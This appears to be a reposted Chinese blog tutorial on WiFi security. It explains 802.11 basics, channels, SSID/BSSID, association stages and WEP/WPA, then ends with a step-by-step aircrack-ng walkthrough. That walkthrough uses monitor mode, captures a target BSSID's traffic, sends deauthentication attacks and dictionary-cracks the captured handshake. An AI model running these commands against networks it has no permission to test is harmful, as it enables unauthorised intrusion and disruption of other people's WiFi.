物联网安全之WIFI协议
2022-11-1 21:3:24 Author: 轩公子谈技术(查看原文) 阅读量:8 收藏

wifi是什么?

无线协议,手机上的无线技术,也叫做WIFI或是WLAN功能。WIFI全称Wireless Fidelity,又称802.11b标准,它的最大优点就是传输速度较高,可以达到11Mbps,另外它的有效距离也很长,同时也与已有的各种802.11DSSS设备兼容。Wi-Fi 无线保真技术与蓝牙技术一样,同属于在办公室和家庭中使用的短距离无线技术。该技术使用的是2.4GHz附近的频段,该频段尚属没用许可的无线频段。其可使用的标准有两个,分别是IEEE802.11a和IEEE802.11b。IEEE802.11g是802.11b的继任者,在802.11b所使用的相同的2.4GHz频段上提供了最高54Mbps的数据传输率

wlan

WLAN是Wireless Local Area Network的简称,指应用无线通信技术将计算机设备互联起来,构成可以互相通信和实现资源共享的网络体系。无线局域网本质的特点是不再使用通信电缆将计算机与网络连接起来,而是通过无线的方式连接,从而使网络的构建和终端的移动更加灵活。
它是相当便利的数据传输系统,它利用射频(Radio Frequency;RF)的技术,使用电磁波,取代旧式碍手碍脚的双绞铜线(Coaxial)所构成的局域网络,在空中进行通信连接,使得无线局域网络能利用简单的存取架构让用户透过它,达到“信息随身化、便利走天下”的理想境界。

Wifi 与 网线

1、通信方面的区别

无线网络通信双方因为是通过无线进行通信,所以通信之前需要建立连接;而有线网络就直接用线缆连接,不用这个过程了。通信双方通信方式是半双工的通信方式;而有线网络可以是全双工。通信时无线网络在网络层以下出错的概率非常高,所以帧的重传概率很大;而有线网络出错概率非常小。

2、性能方面的区别

有线网络提供卓越的性能。无线网络连接仅提供10Mbps带宽,相反100Mbps有线网络虽然成本稍高,但很容易获得。

3、安全方面的区别

无线网络不如有线网络安全。这是因为无线通信信号在空中传播并且可以被拦截。

wifi频谱划分

2.4GHz的wifi,有14个频谱,其中1 6 11 互不干扰。什么意思?比如一套房里,有客厅,主卧,次卧,分别装了三个路由器,三个电磁波都会受到干扰,上网卡,此时分别设置无线信道为1 6 11,在使用就不会产生卡顿了。

SSID&BSSID

1)基本服务集(BSS)

基本服务集是802.11 LAN的基本组成模块。能互相进行无线通信的STA可以组成一个BSS(Basic Service Set) 。如果一个站移出BSS的覆盖范围,它将不能再与BSS的其它成员通信。

2)扩展服务集(ESS)

多个BSS可以构成一个扩展网络,称为扩展服务集(ESS)网络,一个ESS网络内部的STA可以互相通信,是采用相同的SSID的多个BSS形成的更大规模的虚拟BSS。连接BSS的组件称为分布式系统(Distribution System,DS)。

SSID是服务集的标识,在同一SS内的所有STA和AP必须具有相同的SSID,否则无法进行通信。

SSID是一个ESS的网络标识(路由器的名称,可自己设置)

BSSID是AP的MAC地址,用来标识AP管理的BSS(路由器的mac地址,无法更改)

无线接入过程三个阶段

 STA(工作站)启动初始化、开始正式使用AP传送数据帧前,要经过三个阶段才能够接入(802.11MAC层负责客户端与AP之间的通讯,功能包括扫描、接入、认证、加密、漫游和同步等功能):

1)扫描阶段(SCAN)

2)认证阶段 (Authentication)

3)关联(Association)

认证连接方式

无认证(免费wifi)

有认证

 ssid-密码认证

 wep

 wpa/wpa2

 wps

wep

WEP是Wired Equivalent Privacy的简称,有线等效保密(WEP)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络。不过密码分析学家已经找出 WEP 好几个弱点,因此在2003年被 Wi-Fi Protected Access (WPA) 淘汰,又在2004年由完整的 IEEE 802.11i 标准(又称为 WPA2)所取代。WEP 虽然有些弱点,但也足以吓阻非专业人士的窥探了。

wpa/wpa2

WPA全名为Wi-Fi Protected Access,有WPA、WPA2和WPA3三个标准,是一种保护无线电脑网络(Wi-Fi)安全的系统,它是应研究者在前一代的系统有线等效加密(WEP)中找到的几个严重的弱点而产生的。WPA实作了IEEE 802.11i标准的大部分,是在802.11i完备之前替代WEP的过渡方案。WPA的设计可以用在所有的无线网卡上,但未必能用在第一代的无线取用点上。WPA2具备完整的标准体系,但其不能被应用在某些老旧型号的网卡上。

wpa握手流程

实战演练爆破wifi密码

需购买无线网卡免驱usb

iwconfig 查看无线网卡状态

airmon-ng check kill 关闭占有网卡的进程

激活网卡,需记住下面的网卡名字

airmon-ng start wlxxxxx

查看当前有哪些WIFI

airodump-ng wlan0mon

针对某个wifi流量抓取

airodump-ng -c 11 --bssid 30:D3:86:E2:40:D0  -w 207 wlan0mon
c: 指定它的信道bssidmac地址w: 任意文件名称,用来保存流量

选择一个连接的wifi,进行流量攻击

aireplay-ng -0 40  -a 30:D3:86:E2:40:D0 wlan0mon0: 发送攻击次数a: mac地址

爆破cap流量中的密码

aircrack-ng -w pass.txt 207-01.cap


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MDg2NDI4OA==&mid=2247487212&idx=1&sn=31825796bf33ebb1c65849d7fbd59a66&chksm=fce9a923cb9e203521b089c2da2db46b1cffa3b668d90ab3fdccfc9cb72a5ce09385f3b6c167#rd
如有侵权请联系:admin#unsafe.sh